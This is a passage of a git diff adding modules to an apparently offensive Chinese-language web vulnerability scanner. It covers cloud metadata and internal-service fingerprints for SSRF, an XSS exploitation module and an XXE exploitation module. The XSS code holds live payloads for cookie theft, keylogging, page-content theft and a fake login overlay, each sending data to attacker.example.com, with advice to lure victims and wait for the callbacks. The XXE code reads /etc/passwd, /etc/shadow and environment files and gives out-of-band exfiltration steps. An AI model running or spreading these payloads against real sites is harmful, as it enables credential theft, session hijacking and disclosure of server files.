+            parsed_url = urllib.parse.urlparse(target_url)
+            host = parsed_url.netloc.split(':')[0]
+            path = parsed_url.path
+            
+            # AWS元数据服务特征
+            if host == '169.254.169.254':
+                indicators = ['ami-id', 'instance-id', 'instance-type', 'local-hostname', 
+                             'local-ipv4', 'public-hostname', 'public-ipv4', 'security-credentials']
+                             
+            # GCP元数据服务特征
+            elif host == 'metadata.google.internal':
+                indicators = ['instance', 'attributes', 'service-accounts', 'project', 
+                             'hostname', 'image', 'machine-type']
+                             
+            # Azure元数据服务特征
+            elif host == '169.254.169.254' and 'metadata' in path:
+                indicators = ['vmId', 'compute', 'network', 'osType', 'location', 
+                             'resourceGroupName', 'apiVersion']
+                             
+            # 阿里云元数据服务特征
+            elif host == '100.100.100.200':
+                indicators = ['instance-id', 'region-id', 'zone-id', 'vpc-id', 
+                             'private-ipv4']
+                             
+            # Redis服务特征
+            elif host == '127.0.0.1' and '6379' in target_url:
+                indicators = ['redis_version', 'connected_clients', 'PONG', 'ERR', 
+                             'NOAUTH', 'AUTH']
+                             
+            # MySQL服务特征
+            elif host == '127.0.0.1' and '3306' in target_url:
+                indicators = ['mysql', 'SQL', 'MariaDB', 'syntax', 'Access denied', 
+                             'error', 'server version']
+                             
+            # Elasticsearch服务特征
+            elif host == '127.0.0.1' and ('9200' in target_url or 'elasticsearch' in target_url):
+                indicators = ['cluster_name', 'nodes', 'shards', 'indices', 'lucene_version', 
+                             'version', 'elasticsearch']
+                             
+            # MongoDB服务特征
+            elif host == '127.0.0.1' and '27017' in target_url:
+                indicators = ['mongodb', 'databases', 'collections', 'command', 
+                             'assertion', 'not authorized']
+                             
+            # Docker API特征
+            elif host == '127.0.0.1' and ('2375' in target_url or 'docker' in target_url):
+                indicators = ['containers', 'images', 'volumes', 'version', 
+                             'docker', 'Config', 'Id', 'Name']
+                             
+            # Web服务器标识
+            else:
+                indicators = ['apache', 'nginx', 'iis', 'server', 'web server', 'title', 
+                             'html', 'body', 'login', 'admin', 'index', 'welcome', 
+                             '404', '403', '401', '500', 'error', 'not found', 'forbidden']
+                             
+        except Exception as e:
+            logger.error(f"获取服务特征指标时出错: {str(e)}")
+            
+        return indicators 
\ No newline at end of file
diff --git a/xss_scanner/exploits/xss_exploit.py b/xss_scanner/exploits/xss_exploit.py
new file mode 100644
index 0000000..9921193
--- /dev/null
+++ b/xss_scanner/exploits/xss_exploit.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS漏洞利用模块，负责利用发现的XSS漏洞
+"""
+
+import logging
+import random
+import string
+import base64
+from urllib.parse import urlencode, urlparse, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSExploit:
+    """XSS漏洞利用类，负责利用XSS漏洞执行特定操作"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XSS漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        self.exploit_id = self._generate_random_string(8)
+        
+        # 常用的XSS利用载荷
+        self.cookie_steal_payload = f"""<script>
+new Image().src="http://attacker.example.com/steal.php?cookie="+encodeURIComponent(document.cookie)+"&location="+encodeURIComponent(window.location)+"&id={self.exploit_id}";
+</script>"""
+
+        self.keylogger_payload = f"""<script>
+document.addEventListener('keydown', function(e) {{
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/log.php?key='+e.key+'&id={self.exploit_id}', true);
+    xhr.send();
+}});
+</script>"""
+
+        self.session_hijack_payload = f"""<script>
+var xhr = new XMLHttpRequest();
+xhr.open('GET', '/profile', true);
+xhr.onload = function() {{
+    var content = this.responseText;
+    var xhr2 = new XMLHttpRequest();
+    xhr2.open('GET', 'http://attacker.example.com/steal.php?data='+encodeURIComponent(content)+'&id={self.exploit_id}', true);
+    xhr2.send();
+}};
+xhr.send();
+</script>"""
+
+        self.phishing_payload = f"""<div style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:white;z-index:9999;">
+<h2 style="text-align:center;margin-top:20px;">您的会话已过期</h2>
+请重新登录以继续
+<form style="width:300px;margin:0 auto;" onsubmit="sendCredentials(event)">
+<input type="text" name="username" placeholder="用户名" style="width:100%;padding:10px;margin:10px 0;">
+<input type="password" name="password" placeholder="密码" style="width:100%;padding:10px;margin:10px 0;">
+<button type="submit" style="width:100%;padding:10px;background-color:#4CAF50;color:white;border:none;">登录</button>
+</form>
+<script>
+function sendCredentials(e) {{
+    e.preventDefault();
+    var u = document.querySelector('input[name="username"]').value;
+    var p = document.querySelector('input[name="password"]').value;
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/phish.php?u='+encodeURIComponent(u)+'&p='+encodeURIComponent(p)+'&id={self.exploit_id}', true);
+    xhr.onload = function() {{
+        window.location = '/login';
+    }};
+    xhr.send();
+}}
+</script>
+</div>"""
+    
+    def exploit(self, vulnerability):
+        """
+        利用XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        if vulnerability['type'] != 'XSS':
+            logger.warning(f"漏洞类型不匹配，预期XSS，实际为{vulnerability['type']}")
+            return None
+            
+        logger.info(f"尝试利用XSS漏洞: {vulnerability['url']}")
+        
+        # 根据漏洞子类型选择不同的利用方式
+        if vulnerability['subtype'] == 'Reflected XSS':
+            return self._exploit_reflected_xss(vulnerability)
+        elif vulnerability['subtype'] == 'Stored XSS':
+            return self._exploit_stored_xss(vulnerability)
+        elif vulnerability['subtype'] == 'DOM XSS':
+            return self._exploit_dom_xss(vulnerability)
+        else:
+            logger.warning(f"未知的XSS漏洞子类型: {vulnerability['subtype']}")
+            return None
+    
+    def _exploit_reflected_xss(self, vulnerability):
+        """
+        利用反射型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞URL和参数
+        url = vulnerability['url']
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payloads = [
+            self.cookie_steal_payload,
+            self.keylogger_payload,
+            self.session_hijack_payload,
+            self.phishing_payload
+        ]
+        
+        # 随机选择一个载荷进行利用
+        payload = random.choice(payloads)
+        
+        # 构建利用URL
+        parsed_url = urlparse(url)
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        if parameter in query_params:
+            query_params[parameter] = payload
+            
+            # 构建利用URL
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+            
+            logger.info(f"生成XSS利用URL: {exploit_url}")
+            
+            return {
+                'type': 'XSS_EXPLOIT',
+                'exploit_type': '反射型XSS漏洞利用',
+                'url': exploit_url,
+                'payload': payload,
+                'description': f"反射型XSS漏洞利用成功，可以通过URL诱导用户访问触发XSS。",
+                'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+            }
+        
+        return None
+    
+    def _exploit_stored_xss(self, vulnerability):
+        """
+        利用存储型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # 获取漏洞表单提交信息
+        url = vulnerability['url']
+        form_action = vulnerability.get('form_action', url)
+        form_method = vulnerability.get('form_method', 'POST')
+        parameter = vulnerability['parameter']
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 构建表单数据
+        form_data = {
+            parameter: payload
+        }
+        
+        logger.info(f"尝试提交存储型XSS利用载荷到: {form_action}")
+        
+        # 提交表单
+        try:
+            if form_method.upper() == 'POST':
+                response = self.http_client.post(form_action, data=form_data)
+            else:
+                response = self.http_client.get(form_action, params=form_data)
+                
+            if response and response.status_code < 400:
+                return {
+                    'type': 'XSS_EXPLOIT',
+                    'exploit_type': '存储型XSS漏洞利用',
+                    'url': form_action,
+                    'payload': payload,
+                    'description': f"存储型XSS漏洞利用成功，XSS Payload已经注入到目标站点，将在用户访问时触发。",
+                    'recommendation': "等待用户访问包含存储型XSS的页面，然后接收回连数据。"
+                }
+        except Exception as e:
+            logger.error(f"利用存储型XSS漏洞时发生错误: {str(e)}")
+            
+        return None
+    
+    def _exploit_dom_xss(self, vulnerability):
+        """
+        利用DOM型XSS漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果，如果利用失败则返回None
+        """
+        # DOM型XSS通常涉及到URL片段（hash）或特定参数
+        url = vulnerability['url']
+        parameter = vulnerability.get('parameter', 'fragment')
+        
+        # 构建利用载荷
+        payload = self.cookie_steal_payload
+        
+        # 如果是URL片段，直接添加到URL末尾
+        if parameter == 'fragment':
+            exploit_url = f"{url}#{payload}"
+        else:
+            # 否则作为URL参数
+            parsed_url = urlparse(url)
+            query_params = dict(parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            exploit_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(query_params)}"
+        
+        logger.info(f"生成DOM XSS利用URL: {exploit_url}")
+        
+        return {
+            'type': 'XSS_EXPLOIT',
+            'exploit_type': 'DOM型XSS漏洞利用',
+            'url': exploit_url,
+            'payload': payload,
+            'description': f"DOM型XSS漏洞利用成功，可以通过URL触发客户端XSS。",
+            'recommendation': "诱导用户访问该URL，然后等待回连数据。"
+        }
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length)) 
\ No newline at end of file
diff --git a/xss_scanner/exploits/xxe_exploit.py b/xss_scanner/exploits/xxe_exploit.py
new file mode 100644
index 0000000..5ad1f89
--- /dev/null
+++ b/xss_scanner/exploits/xxe_exploit.py
@@ -0,0 +1,532 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XXE（XML外部实体注入）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+import time
+import xml.dom.minidom
+
+logger = logging.getLogger('xss_scanner')
+
+class XXEExploit:
+    """XXE漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XXE漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # XXE有效载荷模板
+        self.xxe_payloads = {
+            # 基本文件读取
+            "file_read": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<foo>&xxe;</foo>""",
+            
+            # 带外数据泄露 (OOB)
+            "oob_exfiltration": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % dtd SYSTEM "{callback_server}/xxe.dtd">
+%dtd;
+]>
+<foo>&send;</foo>""",
+            
+            # 错误诱导泄露
+            "error_based": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+%eval;
+%error;
+]>
+<foo>Error Based XXE</foo>""",
+            
+            # PHP过滤器
+            "php_filter": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}" >]>
+<foo>&xxe;</foo>""",
+            
+            # 参数实体
+            "parameter_entity": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ENTITY % xxe SYSTEM "file:///{file_path}" >
+%xxe;
+]>
+<foo>Parameter Entity XXE</foo>""",
+            
+            # SOAP注入
+            "soap_xxe": """<?xml version="1.0" encoding="UTF-8"?>
+<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+<!DOCTYPE foo [
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<soap:Body><foo>&xxe;</foo></soap:Body>
+</soap:Envelope>""",
+            
+            # SVG注入
+            "svg_xxe": """<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE svg [ 
+<!ENTITY xxe SYSTEM "file:///{file_path}" >]>
+<svg width="100" height="100">
+    <text x="10" y="20">&xxe;</text>
+</svg>"""
+        }
+        
+        # XXE DTD内容模板
+        self.xxe_dtd_template = """<!ENTITY % file SYSTEM "file:///{file_path}">
+<!ENTITY % combined "<!ENTITY send SYSTEM '{callback_server}?data=%file;'>">
+%combined;"""
+        
+        # 敏感文件列表
+        self.sensitive_files = [
+            "/etc/passwd",
+            "/etc/hosts",
+            "/etc/shadow",
+            "/etc/group",
+            "/etc/issue",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            "C:/Windows/win.ini",
+            "C:/boot.ini",
+            "C:/Windows/System32/drivers/etc/hosts"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用XXE漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用XXE漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试读取敏感文件
+        for file_path in self.sensitive_files[:5]:  # 只尝试前5个文件
+            result = self._read_file_via_xxe(url, parameter, file_path, form_action, form_method)
+            if result and result['success']:
+                return result
+                
+        # 生成随机回调标识符
+        callback_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        callback_server = f"http://xxe-callback-{callback_id}.example.com"
+        
+        # 如果没有成功读取文件，提供OOB XXE的步骤
+        return {
+            'success': False,
+            'message': '无法通过本地测试确认XXE漏洞，请尝试带外(OOB)XXE测试',
+            'data': {
+                'parameter': parameter,
+                'url': url,
+                'oob_details': {
+                    'callback_id': callback_id,
+                    'callback_server': callback_server
+                }
+            },
+            'manual_steps': [
+                "1. 设置一个你控制的Web服务器，托管以下DTD文件:",
+                self.xxe_dtd_template.format(file_path="/etc/passwd", callback_server=callback_server),
+                "2. 确保该DTD文件可通过HTTP/HTTPS访问，例如: http://your-server.com/xxe.dtd",
+                "3. 构造XXE payload:",
+                self.xxe_payloads["oob_exfiltration"].format(file_path="/etc/passwd", callback_server="http://your-server.com"),
+                "4. 将此payload注入到目标参数中",
+                "5. 如果你的服务器收到包含/etc/passwd内容的回调请求，则确认存在XXE漏洞"
+            ],
+            'poc': self.xxe_payloads["file_read"].format(file_path="/etc/passwd")
+        }
+        
+    def _read_file_via_xxe(self, url, parameter, file_path, form_action=None, form_method=None):
+        """
+        通过XXE读取文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试通过XXE读取文件: {file_path}")
+            
+            # 生成XXE有效载荷
+            xxe_payload = self.xxe_payloads["file_read"].format(file_path=file_path)
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                return self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
+            else:
+                return self._exploit_via_url(url, parameter, xxe_payload, file_path)
+                
+        except Exception as e:
+            logger.error(f"尝试利用XXE漏洞时出错: {str(e)}")
+            return None
+            
+    def _exploit_via_form(self, url, parameter, xxe_payload, file_path, form_action, form_method):
+        """
+        通过表单提交利用XXE漏洞
+        
+        Args:
+            url: 目标页面URL
+            parameter: 参数名
+            xxe_payload: XXE有效载荷
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            form_data = {parameter: xxe_payload}
+            
+            # 设置请求头
+            headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            
+            # 提交表单
+            if form_method.upper() == 'POST':
+                response = self.http_client.post(form_action, data=form_data, headers=headers)
+            else:
+                response = self.http_client.get(form_action, params=form_data, headers=headers)
+                
+            # 检查响应是否包含文件内容特征
+            if response and response.status_code == 200:
+                extracted_content = self._extract_file_content(response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': xxe_payload
+                    }
+                    
+        except Exception as e:
+            logger.error(f"通过表单提交XXE有效载荷时出错: {str(e)}")
+            
+        return None
+        
+    def _exploit_via_url(self, url, parameter, xxe_payload, file_path):
+        """
+        通过URL参数利用XXE漏洞
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            xxe_payload: XXE有效载荷
+            file_path: 要读取的文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            # 构建包含XXE有效载荷的URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = xxe_payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 设置请求头
+            headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            
+            # 发送请求
+            response = self.http_client.get(new_url, headers=headers)
+            
+            # 检查响应是否包含文件内容特征
+            if response and response.status_code == 200:
+                extracted_content = self._extract_file_content(response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+            # 尝试使用POST方法
+            post_headers = {
+                'Content-Type': 'application/xml',
+                'Accept': '*/*'
+            }
+            post_response = self.http_client.post(url, data=xxe_payload, headers=post_headers)
+            
+            if post_response and post_response.status_code == 200:
+                extracted_content = self._extract_file_content(post_response.text, file_path)
+                if extracted_content:
+                    logger.info(f"成功通过POST XXE读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用XXE漏洞（POST方法）读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': extracted_content[:1000] + ('...' if len(extracted_content) > 1000 else ''),
+                            'full_content_length': len(extracted_content)
+                        },
+                        'poc': xxe_payload,
+                        'method': 'POST',
+                        'target_url': url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"通过URL参数利用XXE漏洞时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_file_content(self, response_text, file_path):
+        """
+        从响应中提取文件内容
+        
+        Args:
+            response_text: 响应文本
+            file_path: 尝试访问的文件路径
+            
+        Returns:
+            str: 提取的文件内容，如果未找到返回None
+        """
+        # 根据文件类型识别特征
+        if '/etc/passwd' in file_path:
+            # 查找/etc/passwd文件特征
+            if re.search(r"root:.*:0:0:", response_text):
+                # 提取完整的passwd文件内容
+                passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
+                if passwd_lines:
+                    return "\n".join(passwd_lines)
+                    
+        elif '/etc/hosts' in file_path:
+            # 查找/etc/hosts文件特征
+            if re.search(r"127\.0\.0\.1\s+localhost", response_text):
+                # 提取完整的hosts文件内容
+                hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if hosts_content:
+                    return hosts_content.group(1)
+                    
+        elif 'win.ini' in file_path.lower():
+            # 查找win.ini文件特征
+            if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
+                # 提取完整的win.ini文件内容
+                win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
+                if win_ini_content:
+                    return win_ini_content.group(1)
+                    
+        # 检查是否包含Base64编码的内容
+        base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
+        matches = re.findall(base64_pattern, response_text)
+        for match in matches:
+            try:
+                # 尝试解码
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                
+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"root:.*:0:0:", decoded) or 
+                    re.search(r"127\.0\.0\.1\s+localhost", decoded) or
+                    re.search(r"\[fonts\]|\[extensions\]", decoded, re.IGNORECASE)):
+                    return decoded
+                    
+            except Exception:
+                continue
+                
+        # 通用文件内容检测
+        # 如果响应文本长度超过一定阈值，且不包含HTML标签，可能是文件内容
+        if len(response_text) > 20 and not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE):
+            # 去除可能的XML标签
+            clean_text = re.sub(r"<[^>]+>", "", response_text)
+            if len(clean_text.strip()) > 0:
+                return clean_text
+                
+        return None
+        
+    def _try_php_filter(self, url, parameter, file_path, form_action=None, form_method=None):
+        """
+        尝试使用PHP过滤器
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试使用PHP过滤器读取文件: {file_path}")
+            
+            # 生成PHP过滤器XXE有效载荷
+            xxe_payload = self.xxe_payloads["php_filter"].format(file_path=file_path)
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                result = self._exploit_via_form(url, parameter, xxe_payload, file_path, form_action, form_method)
+            else:
+                result = self._exploit_via_url(url, parameter, xxe_payload, file_path)
+                
+            return result
+                
+        except Exception as e:
+            logger.error(f"尝试使用PHP过滤器时出错: {str(e)}")
+            return None
+            
+    def _try_oob_xxe(self, url, parameter, file_path, callback_server, form_action=None, form_method=None):
+        """
+        尝试使用带外(OOB) XXE
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 要读取的文件路径
+            callback_server: 回调服务器URL
+            form_action: 表单操作URL
+            form_method: 表单方法
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试使用带外(OOB) XXE读取文件: {file_path}")
+            
+            # 生成OOB XXE有效载荷
+            xxe_payload = self.xxe_payloads["oob_exfiltration"].format(
+                file_path=file_path,
+                callback_server=callback_server
+            )
+            
+            # 如果表单操作和方法都存在，使用表单提交
+            if form_action and form_method:
+                form_data = {parameter: xxe_payload}
+                
+                # 设置请求头
+                headers = {
+                    'Content-Type': 'application/xml',
+                    'Accept': '*/*'
+                }
+                
+                # 提交表单
+                if form_method.upper() == 'POST':
+                    self.http_client.post(form_action, data=form_data, headers=headers)
+                else:
+                    self.http_client.get(form_action, params=form_data, headers=headers)
+            else:
+                # 构建包含XXE有效载荷的URL
+                parsed_url = urllib.parse.urlparse(url)
+                query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+                query_params[parameter] = xxe_payload
+                
+                # 重建查询字符串
+                new_query = urllib.parse.urlencode(query_params)
+                new_url = urllib.parse.urlunparse((
+                    parsed_url.scheme,
+                    parsed_url.netloc,
+                    parsed_url.path,
+                    parsed_url.params,
+                    new_query,
+                    parsed_url.fragment
+                ))
+                
+                # 设置请求头
+                headers = {
+                    'Content-Type': 'application/xml',
+                    'Accept': '*/*'
+                }
+                
+                # 发送请求
+                self.http_client.get(new_url, headers=headers)
+                
+            # 等待回调服务器响应
+            # 注意：在实际环境中，这需要回调服务器的实现
+            time.sleep(2)
+            
+            # 检查回调是否收到
+            # 这里假设有一个check_callback方法
+            if hasattr(self, 'check_callback') and self.check_callback(callback_server):
+                logger.info(f"成功通过OOB XXE获取文件内容: {file_path}")
+                return {
+                    'success': True,
+                    'message': f'成功通过带外(OOB) XXE读取文件: {file_path}',
+                    'data': {
+                        'file_path': file_path,
+                        'callback_server': callback_server
+                    },
+                    'poc': xxe_payload
+                }
+                
+        except Exception as e:
+            logger.error(f"尝试使用带外(OOB) XXE时出错: {str(e)}")
+            
+        return None
+        
+    def _prettify_xml(self, xml_string):
+        """
+        美化XML字符串
+        
+        Args:
+            xml_string: XML字符串
+            
+        Returns:
+            str: 美化后的XML字符串
+        """
+        try:
+            dom = xml.dom.minidom.parseString(xml_string)
+            pretty_xml = dom.toprettyxml()
+            return pretty_xml
+        except Exception:
+            return xml_string 
\ No newline at end of file
diff --git a/xss_scanner/main.py b/xss_scanner/main.py
new file mode 100644
index 0000000..2c66126
--- /dev/null
+++ b/xss_scanner/main.py
@@ -0,0 +1,135 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS 深度漏洞扫描器
+作者: 高级渗透工程师
+版本: 1.0.0
+描述: 一个全面的XSS漏洞扫描工具，能够扫描多种平台的XSS漏洞，并提供其他漏洞的辅助扫描功能
+"""
+
+import sys
+import os
+import argparse
+import time
+import logging
+from datetime import datetime
+
+# 导入内部模块
+from xss_scanner.core.scanner_engine import ScannerEngine
+from xss_scanner.core.config import Config
+from xss_scanner.core.logger import setup_logger
+from xss_scanner.ui.cli import display_banner, display_progress, display_results
+from xss_scanner.utils.validator import validate_target
+
+def parse_arguments():
+    """解析命令行参数"""
+    parser = argparse.ArgumentParser(description='XSS 深度漏洞扫描器')
+    parser.add_argument('-u', '--url', help='目标URL')
+    parser.add_argument('-f', '--file', help='包含目标URL的文件')
+    parser.add_argument('-d', '--depth', type=int, default=2, help='爬虫深度 (默认: 2)')
+    parser.add_argument('-t', '--threads', type=int, default=5, help='线程数 (默认: 5)')
+    parser.add_argument('--timeout', type=int, default=10, help='请求超时时间，单位秒 (默认: 10)')
+    parser.add_argument('--user-agent', help='自定义User-Agent')
+    parser.add_argument('--cookie', help='请求Cookie')
+    parser.add_argument('--headers', help='自定义HTTP头，格式: "Header1:Value1;Header2:Value2"')
+    parser.add_argument('--proxy', help='HTTP代理，格式: http://user:pass@host:port')
+    parser.add_argument('--scan-level', type=int, choices=[1, 2, 3], default=2, 
+                        help='扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)')
+    parser.add_argument('--scan-type', choices=['all', 'xss', 'csrf', 'sqli', 'lfi', 'rfi', 'ssrf', 'xxe'], 
+                        default='all', help='扫描类型 (默认: all)')
+    parser.add_argument('--payload-level', type=int, choices=[1, 2, 3], default=2,
+                        help='Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)')
+    parser.add_argument('-o', '--output', help='输出报告文件路径')
+    parser.add_argument('--format', choices=['txt', 'html', 'json', 'xml'], default='html',
+                        help='报告输出格式 (默认: html)')
+    parser.add_argument('-v', '--verbose', action='store_true', help='显示详细输出')
+    parser.add_argument('--no-color', action='store_true', help='禁用彩色输出')
+    
+    # 高级选项
+    advanced_group = parser.add_argument_group('高级选项')
+    advanced_group.add_argument('--browser', action='store_true', help='使用真实浏览器进行扫描')
+    advanced_group.add_argument('--exploit', action='store_true', help='尝试利用发现的漏洞')
+    advanced_group.add_argument('--custom-payloads', help='自定义Payload文件路径')
+    advanced_group.add_argument('--exclude', help='排除URL模式 (正则表达式)')
+    advanced_group.add_argument('--include', help='仅包含URL模式 (正则表达式)')
+    advanced_group.add_argument('--auth', help='基本认证，格式: username:password')
+    
+    return parser.parse_args()
+
+def main():
+    """主函数"""
+    # 显示Banner
+    display_banner()
+    
+    # 解析命令行参数
+    args = parse_arguments()
+    
+    # 配置日志
+    log_level = logging.DEBUG if args.verbose else logging.INFO
+    logger = setup_logger(log_level, args.no_color)
+    
+    # 配置扫描器
+    config = Config()
+    config.load_from_args(args)
+    
+    # 验证目标
+    targets = []
+    if args.url:
+        if validate_target(args.url):
+            targets.append(args.url)
+        else:
+            logger.error(f"无效的目标URL: {args.url}")
+            sys.exit(1)
+    elif args.file:
+        if not os.path.exists(args.file):
+            logger.error(f"文件不存在: {args.file}")
+            sys.exit(1)
+        with open(args.file, 'r') as f:
+            for line in f:
+                url = line.strip()
+                if validate_target(url):
+                    targets.append(url)
+    else:
+        logger.error("必须指定目标URL(-u)或包含目标的文件(-f)")
+        sys.exit(1)
+    
+    if not targets:
+        logger.error("没有有效的目标")
+        sys.exit(1)
+    
+    # 初始化扫描引擎
+    scanner = ScannerEngine(config)
+    
+    # 开始扫描
+    start_time = time.time()
+    logger.info(f"扫描开始，目标数量: {len(targets)}")
+    
+    results = []
+    for target in targets:
+        logger.info(f"正在扫描: {target}")
+        result = scanner.scan(target)
+        results.append(result)
+        
+    total_time = time.time() - start_time
+    
+    # 显示结果
+    display_results(results, total_time)
+    
+    # 生成报告
+    if args.output:
+        from xss_scanner.reporters.report_generator import generate_report
+        generate_report(results, args.output, args.format)
+        logger.info(f"报告已保存至: {args.output}")
+    
+    logger.info(f"扫描完成，总耗时: {total_time:.2f}秒")
+
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        print("\n用户中断，扫描已停止")
+        sys.exit(0)
+    except Exception as e:
+        print(f"发生错误: {str(e)}")
+        sys.exit(1) 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level1.txt b/xss_scanner/payloads/xss/xss_level1.txt
new file mode 100644
index 0000000..ae0feee
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level1.txt
